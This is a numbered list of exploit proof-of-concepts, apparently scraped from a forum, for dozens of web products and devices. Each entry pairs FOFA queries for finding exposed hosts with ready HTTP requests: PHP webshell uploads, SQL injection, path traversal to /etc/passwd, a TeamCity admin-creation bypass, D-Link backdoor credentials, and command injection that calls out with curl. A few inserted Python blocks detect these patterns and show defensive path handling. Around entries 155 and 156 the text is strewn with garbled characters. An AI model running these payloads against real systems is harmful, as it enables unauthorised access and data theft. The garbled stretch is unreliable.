Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--


131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
The orderBy parameter is concatenated into the ORDER BY clause; the conditional SLEEP(3) fires only when the database name is 11 characters long, which gives a blind, time-based oracle.
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
The path given in the jsp parameter ends in ;.jsp, so the pre-authentication check treats it as a public JSP while the server still routes it to /app/rest/users; the body creates a user holding the SYSTEM_ADMIN role.
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199 (path traversal to authenticated-only pages in the same versions):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


Script: CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--


134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
The IPAddr value inside the JSON message is concatenated into a query; the updatexml() error reveals the result of select version().
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}


135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
The /api/cors route fetches whatever URL is embedded in the request path; a DNS log callback confirms the server-side request.
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1


138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1


140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1


141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded


dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -


142. CMSV6 vehicle monitoring platform default credentials
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
CVE-2024-3273 (command injection) / CVE-2024-3272 (hard-coded credentials)
FOFA:app="D_Link-DNS-ShareCenter"
user=mydlinkBRionyg with passwd=YWJjMTIzNDVjYmE (base64 of abc12345cba) is the device's built-in backdoor account; the system parameter carries the command to run, base64-encoded (aWQ= is id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
The SESSID cookie value is used unchecked as a file name under /opt/panlogs/tmp/device_telemetry/minute/; the device-telemetry job later interpolates that file name into a shell command, so the backticked curl runs and the DNS log records the callback.
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog host>`;
Accept-Encoding: gzip


146. MajorDoMo thumb.php unauthenticated remote code execution
CVE-2023-50917 / CNVD-2024-02175
FOFA:app="MajordomoSL"
url=cnRzcDovL2EK is base64 for rtsp://a; the transport parameter is concatenated into the shell command that handles the stream, and its decoded value || (echo '[S]'; id; echo '[E]')#; prints the output of id between the two markers.
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
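
Entries 126, 129, 132 (CVE-2024-27199) and 147 above are all the same defect: a request path or parameter containing ../ is joined onto a directory or a route prefix without being resolved first. The example below is added here and is not code from this page or from any of the affected products; it shows how to surface such requests from captured targets (including double-encoded %2e%2e) and the resolution a static-file handler should perform instead. The sample targets are constructed from the PoCs above, and the root directory /srv/www/static is an assumption.

```python
import os
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request targets modelled on entries 126, 129, 132 (CVE-2024-27199)
# and 147 above, plus one benign request. Not taken from any real log.
SAMPLE_TARGETS = [
    "/static/../../../../../etc/passwd",
    "/pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100",
    "/res/../admin/diagnostic.jsp",
    "/.well-known/acme-challenge/../../admin/diagnostic.jsp",
    "/webeditor/../../../windows/win.ini",
    "/static/css/site.css?v=3",
]


def decode_path(raw: str) -> str:
    """Percent-decode twice (catches %2e%2e and %252e%252e) and fold backslashes to '/'."""
    return unquote(unquote(raw)).replace("\\", "/")


def resolve_segments(path: str) -> Tuple[List[str], bool]:
    """Collapse '.' and '..' and report whether '..' ever climbed above '/'."""
    stack: List[str] = []
    escaped = False
    for seg in decode_path(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        stack.append(seg)
    return stack, escaped


def traversal_findings(target: str) -> List[str]:
    """Reasons a request target looks like a traversal attempt; empty list means clean."""
    parts = urlsplit(target)
    findings: List[str] = []
    segments = [s for s in decode_path(parts.path).split("/") if s]
    if ".." in segments:
        resolved, escaped = resolve_segments(parts.path)
        landing = "/" + "/".join(resolved)
        note = " (climbs above the server root)" if escaped else ""
        findings.append(f"path under /{segments[0]} resolves to {landing}{note}")
    # parse_qsl already percent-decodes values once; decode_path handles a second layer.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if ".." in decode_path(value).split("/"):
            findings.append(f"query parameter {key!r} carries a '..' segment")
    return findings


def safe_static_path(root: str, requested: str) -> Optional[str]:
    """The hardened resolution a static handler needs: canonicalise both sides with
    realpath (symlinks included) and refuse anything that leaves the root."""
    root_real = os.path.realpath(root)
    relative = decode_path(requested).lstrip("/")
    candidate = os.path.realpath(os.path.join(root_real, relative))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def scan(targets: List[str]) -> dict:
    """Map each target to its findings, keeping only the suspicious ones."""
    return {t: f for t in targets if (f := traversal_findings(t))}


if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_TARGETS).items():
        print(target)
        for reason in reasons:
            print("   ", reason)
    print(safe_static_path("/srv/www/static", "../../etc/passwd"))  # None: escapes the root
    print(safe_static_path("/srv/www/static", "css/site.css"))
```

Checking the routed location rather than the literal string is the point: "/res/../admin/diagnostic.jsp" never leaves the server root, which is why a check that only looks for escapes above "/" would miss the TeamCity case, while comparing the first requested segment with where the path lands catches it.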

148. CrushFTP server-side template injection (authentication bypass)
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
The ;swagger-ui/ path parameter makes the URI match the authentication interceptor's allow-list while the framework still routes the request to /dataSetParam/verification; validationRules is then executed by the server-side script engine, which exposes java.lang.ProcessBuilder.

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same endpoint and bypass as entry 149; this variant runs id for a Linux host.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}


151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
The leading ;swagger-ui path parameter again bypasses authentication; the request reaches /dataSource/pageList without a token.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
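
TeamCity (entry 132, where the path under test is the value of the jsp parameter) and AJ-Report (entries 149 to 151) share one mechanism: the authentication filter matches its allow-list against the raw URI, but the servlet container strips the ;param tail from every path segment before dispatching, so ";.jsp" and ";swagger-ui" satisfy the filter without changing where the request lands. The example below is added here and is not code from this page or from either product; it emulates that stripping, places the weak check beside the corrected one, and lists which constructed paths would slip through. The allow-list rules (".jsp" suffix, "swagger-ui" substring) are assumed for illustration.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed request paths modelled on entries 132 and 149-151, plus benign ones.
SAMPLE_PATHS = [
    "/app/rest/users;.jsp",
    "/dataSetParam/verification;swagger-ui/",
    "/;swagger-ui/dataSource/pageList",
    "/swagger-ui/index.html",
    "/login.jsp",
    "/app/rest/users",
]


def strip_path_parameters(raw_path: str) -> str:
    """Reduce a request URI to what a servlet container actually dispatches on:
    drop the ';param' tail of every segment, percent-decode, collapse '//'.
    A literal %3B is not a delimiter for the container, so decoding happens
    after the split, mirroring Tomcat's order of operations."""
    segments = [unquote(seg.split(";", 1)[0]) for seg in raw_path.split("/")]
    return re.sub(r"/{2,}", "/", "/".join(segments)) or "/"


def naive_is_public(raw_path: str) -> bool:
    """The weak pattern: allow-list evaluated on the raw URI with suffix/substring matches."""
    return raw_path.endswith(".jsp") or "swagger-ui" in raw_path


def hardened_is_public(raw_path: str) -> bool:
    """Same allow-list, evaluated on the dispatched path and anchored to whole segments."""
    routed = strip_path_parameters(raw_path)
    if routed.endswith(".jsp"):
        return True
    return routed == "/swagger-ui" or routed.startswith("/swagger-ui/")


def bypass_report(raw_path: str) -> Dict[str, object]:
    """Where the request really goes, and whether only the weak check lets it pass."""
    routed = strip_path_parameters(raw_path)
    naive, hardened = naive_is_public(raw_path), hardened_is_public(raw_path)
    return {
        "routed": routed,
        "naive_allows": naive,
        "hardened_allows": hardened,
        "bypass": naive and not hardened,
    }


def bypass_candidates(paths: List[str]) -> List[str]:
    """Paths whose raw form passes the allow-list but whose routed form would not."""
    return [p for p in paths if bypass_report(p)["bypass"]]


if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        print(f"{path:42} -> {bypass_report(path)}")
```

The same normalisation is worth applying when hunting in access logs: a request whose logged URI contains a semicolon inside a segment and whose routed form is an API or admin path is the signature of this bypass, whatever product produced it.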
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the injected shell command sits in the Basic-auth username of the request that enables the API.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config and take a component id from the components list
http://x.x.x.x/config


Step 2: have the server copy /etc/passwd into its temporary file cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}


Step 3: fetch the cached copy through the /file= route
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd


154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
The gsdwid value is concatenated into a PostgreSQL query; PG_SLEEP(5) gives a time-based oracle.
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
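
The SQL injection PoCs above (entries 131, 134, 135, 137 to 141 and 154) use a small set of recognisable constructs: SLEEP()/PG_SLEEP() for time-based probing, updatexml()/extractvalue() for error-based extraction, UNION ALL SELECT, a quote followed by AND, and a trailing -- comment. They also arrive percent-encoded, as + encoded spaces, or inside a JSON string whose quotes are backslash-escaped (entry 134). The example below is added here and is not code from this page or from any of the products; it peels those layers off a request line and body and reports which constructs are present, so a defender can run the same logic over access logs or a WAF export. The sample requests are constructed from the entries above and the signature list is an assumption, deliberately kept to the patterns this page shows.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Constructed request lines and bodies modelled on entries 131, 134, 135, 137-141
# and 154 above, followed by two benign requests. Not real traffic.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("GET /tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0) HTTP/1.1", ""),
    ("POST /protocol/index.php HTTP/1.1",
     r'''jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\"}"]}'''),
    ("GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1", ""),
    ("GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1", ""),
    ("POST /app/ext/ajax_users.php HTTP/1.1",
     "dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -"),
    ("POST /twms-service-mfs/mfsNotice/page HTTP/1.1",
     r'''{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}'''),
    ("GET /tmall/admin/user/1/1?orderBy=7 HTTP/1.1", ""),
    ("POST /twms-service-mfs/mfsNotice/page HTTP/1.1",
     r'''{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930"}}'''),
]

# Name -> pattern, in the order the tags are reported by classify().
SIGNATURES = {
    "time_based": re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "union_based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "quote_break": re.compile(r"'\)?\s*(and|or)\b", re.I),
    "comment_tail": re.compile(r"--[\s-]*$|/\*|#\s*$"),
}


def decode(text: str) -> str:
    """Undo the layers used to hide a payload: percent/plus encoding, then the
    backslash-escaped quotes of a JSON string embedded in a form field."""
    return unquote_plus(text).replace('\\"', '"').replace("\\'", "'")


def classify(text: str) -> List[str]:
    decoded = decode(text)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(decoded)]


def scan_request(request_line: str, body: str = "") -> Dict[str, object]:
    """Tags found in the target or the body of one request, with its bare path."""
    method, target = request_line.split(" ", 2)[:2]
    tags = sorted(set(classify(target)) | set(classify(body)))
    return {"method": method, "path": target.split("?", 1)[0], "tags": tags}


def suspicious(requests: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """Only the requests that tripped at least one signature."""
    return [r for r in (scan_request(line, body) for line, body in requests) if r["tags"]]


if __name__ == "__main__":
    for finding in suspicious(SAMPLE_REQUESTS):
        print(finding)
```

Decoding before matching is what makes entry 134 visible: in the raw body the injection is split across \" sequences and a + sign, and none of the patterns match until those are undone.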

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--


The response echoes the stored path; the file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
. B; s: Y% _, I% a* B
156. TBK DVR-4104/DVR-4216 操作系统命令注入
, g4 F" G- }, P" A3 E, `2 F) M. SCVE-2024-3721
, F9 ^0 o2 \1 ~: D" oFOFA:"Location: /login.rsp"; s; |; [' T6 l. |- E: z
·TBK DVR-41046 B( |& R$ T7 q( F. N
·TBK DVR-4216( r, Y" y" F2 Z0 U" B% w
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
6 Q" E4 e  ?; R- d$ ^/ l- |- Y4 ?
* l& J/ w, O- D2 r; w/ O, L+ z* y
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
3 f) O4 @* [: n7 YHost: x.x.x.x
1 \# U) b$ o4 f* w# H" I/ tUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 [; o# A3 D2 t0 ~8 l7 g
Connection: close; T! _: h& U# W4 I2 t  G( x
Content-Length: 0
. j7 F2 J# A  R! w7 Z. xCookie: uid=1
3 v0 s" n# G$ l& ~8 NAccept-Encoding: gzip1 y# b) L/ v1 @2 s

- [. m  E4 e" H9 g( Y
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
